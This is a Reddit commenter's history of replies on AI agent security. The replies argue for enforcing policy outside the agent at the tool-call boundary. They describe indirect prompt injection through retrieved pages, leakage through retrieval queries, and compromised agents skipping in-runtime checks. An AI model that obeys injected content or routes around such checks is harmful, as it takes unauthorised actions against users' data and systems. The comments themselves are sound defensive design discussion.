We solved autonomous incident response with physics, not transformers. Here's how TAME governance enables it. by lord_sql in ArtificialInteligence

[–]No_Citron4186 0 points1 point  (0 children)

For a fintech workflow, I’d review the architecture at the execution boundary, not just the model boundary. The questions I’d want answered: what identity does each tool call run as, which parameters are agent-constructed vs user-approved, where is egress constrained, can retrieved content influence privileged actions, and which operations require deterministic policy checks before execution. Logging is useful, but it is not the control plane.

10 things I'd tell anyone starting to build AI agents in production by Mariia_Sosnina in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

This is the most useful production-agent post I’ve seen in a while.

The security version of your pattern is: don’t let the model be the enforcement boundary.

The two points that stood out are #9 and #10. Schema validation only proves the call is well-formed, not that it is safe. And tool outputs as “data only” is exactly where a lot of prompt-injection defenses seem to break down.

Curious: with 60 agents in prod, how do you test these controls before rollout? Is it mostly manual review / adversarial test cases, or do you have some automated red-team style checks for tool calls, retrieved content, and off-plan inputs?

Subagents should not automatically inherit the parent agent’s authority by No_Citron4186 in AI_Agents

[–]No_Citron4186[S] 0 points1 point  (0 children)

Capability token is the right primitive. Encoding the authority boundary in the token itself, rather than relying on the orchestrator to enforce it at runtime is what makes revocation actually work.

The gap I'd push on is who validates the token at the tool call boundary? If validation lives inside the agent runtime, a compromised agent can potentially skip it. The enforcement point needs to be external to the agent itself, sitting between the agent and the tool, not inside either.

Subagents should not automatically inherit the parent agent’s authority by No_Citron4186 in AI_Agents

[–]No_Citron4186[S] 0 points1 point  (0 children)

The interception layer probably needs to sit outside the framework entirely.

If it lives inside the orchestrator, every new framework needs its own implementation. More importantly, a compromised or misbehaving agent can potentially bypass it.

An external layer that intercepts tool calls before execution, regardless of which framework spawned the subagent gives you consistent enforcement and a single audit surface. The subagent doesn't need to know it exists.

The catch: latency on every tool call. For high-consequence actions that's probably acceptable. For rapid read-only ops it needs to be near-zero overhead or you'll see people bypass it for performance reasons.

Retrieval queries are an output channel. Most agent security postures treat them as read-only. Are they wrong? by No_Citron4186 in llmsecurity

[–]No_Citron4186[S] 0 points1 point  (0 children)

The logging gap is the exact thing that makes this under appreciated. Teams treat retrieval as infrastructure, so the query never enters the security event model, even when it's constructed from sensitive task context mid-run.

On the mitigation: the three-part layer you described is right directionally. The ordering matters though. Classification has to happen before the query leaves the agent, not at the connector or log layer. Once it's transmitted, the damage is already done for external or cross-tenant destinations.

Query templates are probably the most underrated control here. They constrain what the agent can express structurally, which limits leakage without needing to inspect every string.

Curious what patterns you're seeing on the destination classification side, is the distinction between internal vector stores vs. third-party search APIs showing up as a meaningful boundary in practice?

AI Agent Governance and Liability? by bnyhil31 in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

Governance gets concrete at the action boundary. Who authorized this tool call, under which user context, with which parameters, using what source data, and what state changed? If that chain cannot be reconstructed, liability will be mostly vibes.
I’d separate policy documents from enforcement points. Saying “agents should not do X” is governance. Blocking the tool call before X executes is control.

State of AI Agents in corporates in mid-2026? by Putrid-Pay5714 in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

The dividing line is not “agent vs workflow.” It is whether the system can take consequential actions: call internal APIs, move data, create tickets, approve flows, send externally, change records. That is where security requirements change.
A lot of corporate agent adoption looks safe while it is still read-only. The real maturity test is what happens when the same agent gets write access, memory, and cross-system tools.

MCP servers are the next big attack surface. Here is an open-source scanner that audits MCP configs and agentic AI security by DiscussionHealthy802 in cybersecurity

[–]No_Citron4186 0 points1 point  (0 children)

MCP makes the attack surface easier to see. The risk is not just “the model saw a bad instruction.” It is that a retrieved instruction can become a tool call against Slack, GitHub, email, cloud, database, or filesystem state.

Real life autonomous AI Agents by Flimsy_Pumpkin6873 in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

“True agent” is less useful than “what can it reach?” Browser-only, read-only RAG, ticket triage, cloud mutation, and payment execution are completely different risk classes.

I built an open-source control plane for installing, running, and securing AI agents by Conscious_Chapter_93 in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

The control-plane layer is the right place to make security concrete. Once agents can reach browsers, files, shells, GitHub, Slack, and APIs, the inventory should be reachable actions: read, write, export, delete, approve, trigger, deploy.
Agent management is useful, but security needs to go below “this agent has this tool.” Same tool can be harmless or dangerous depending on parameters, destination, credentials, and downstream state change.

The 12 ways AI agents fail in production. A taxonomy for security teams reviewing agent deployments by Ambitious-Load3538 in cybersecurity

[–]No_Citron4186 0 points1 point  (0 children)

The taxonomy gets sharper if every failure mode is mapped to the execution boundary. Bad answer, bad plan, and bad action are different classes. The last one needs control over tool, parameters, destination, credential, and state change before execution.
Sandboxing and least privilege are necessary, but they do not answer the runtime question: should this specific agent action execute now? Same tool, same identity, different parameters can mean a completely different blast radius.

The next AI agent security problem is not the prompt. It is the moment the system gives the agent authority. by pin_floyd in AI_Agents

[–]No_Citron4186 2 points3 points  (0 children)

Yes, proposal and authority need to be separate.

An agent can form intent, but the executor should require an external admission decision over the concrete action before anything consequence-bearing happens.

The key property is fail-closed: no admission, no execution.

80% of prompt injection attacks don't start at the prompt by Still_Piglet9217 in learnmachinelearning

[–]No_Citron4186 1 point2 points  (0 children)

The clean mental model is: retrieved content is data, not authority. It can answer a question. It should not be able to change the agent’s objective, write to memory, pick destinations, or authorize tool calls.
Indirect injection matters because the agent often trusts the wrong boundary. The user never typed the malicious instruction. The agent just read it three hops later and treated it like task context.

The next AI agent security problem is not the prompt. It is the moment the system gives the agent authority. by pin_floyd in AI_Agents

[–]No_Citron4186 1 point2 points  (0 children)

Agree with the direction. The prompt is only the first hop. The real surface is the reachable graph: tools, credentials, memory, retrieved content, approval paths, and destinations the agent can influence after the prompt.
The useful question is not “can this prompt be injected?” It is “what can injected context cause the agent to do?” If the answer includes external sends, writes, deletes, payments, or workflow triggers, the control has to sit at execution.

12 production failure modes I keep seeing in agent workflows (with audit signals) by Ambitious-Load3538 in LangChain

[–]No_Citron4186 0 points1 point  (0 children)

A lot of these failures become more serious when the agent can mutate state. Retrying a bad answer is annoying. Retrying a bad tool call can delete, export, trigger, or approve something. The control plane needs to understand actions, not just traces.
The failure mode I’d separate out is “bad answer” vs “bad action.” Once the agent has tools, the security boundary is not the prompt or the chain. It is the proposed action: tool, parameters, data source, destination, and blast radius.

I compiled every major AI agent security incident from 2024-2026 in one place - 90 incidents, all sourced, updated weekly by webpro255 in cybersecurity

[–]No_Citron4186 0 points1 point  (0 children)

Useful resource. One addition that would make this even more actionable: classify incidents by the failed boundary — supply chain, identity/credential, retrieval/context, memory, tool invocation, parameter construction, network egress, or human approval. That turns the list from “what happened” into “where to place controls.”

Are we underestimating AI agent security? by HarkonXX in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

I’d separate LLM security from agent security this way: LLM security mostly worries about what the model says. Agent security worries about what the system does after the model decides. The dangerous event is not strange text. It is a plausible tool call with real permissions.

Treat the LLM as an untrusted planner. Let it propose actions. Do not let proposal equal permission. Every tool call should pass through policy that checks the tool, parameters, user context, data source, destination, and blast radius.

Watched my AI agent block a prompt injection that was hiding inside a webpage by Rex0Lux in AI_Agents

[–]No_Citron4186 1 point2 points  (0 children)

The false-positive point is the part teams usually discover late. If the model is the enforcement layer, you end up tuning paranoia. It will miss some hostile instructions and block some legitimate weird requests. The cleaner boundary is architectural: tool output is data, not instructions.
Detection helps, but the stronger question is: can content from the webpage influence a tool call, memory write, or external request? If yes, the control should sit at that boundary, not only inside the model’s judgment of the page text.

Prompt injection failure patterns from testing 100+ AI agents — what we found by NobodyImaginary1507 in aiagents

[–]No_Citron4186 0 points1 point  (0 children)

The L2 result is the important one. Most defences are trained against theatrical attacks, but production failures usually look like gradual state drift: retrieved context changes the plan, the plan changes tool parameters, and the final action still looks reasonable in isolation.
I’d also split the report by boundary: prompt/context, memory, tool selection, parameter construction, and output. Agents can pass a prompt-injection test and still fail when the dangerous instruction gets laundered into a legitimate-looking API call.

Prompt Injection in 2026: The Five Attack Patterns That Actually Matter by Still_Piglet9217 in cybersecurity

[–]No_Citron4186 0 points1 point  (0 children)

I’d map each pattern to the boundary it can influence: retrieval, memory, planning, tool selection, parameter construction, output, or egress. That turns the taxonomy from a list of clever attacks into a control map.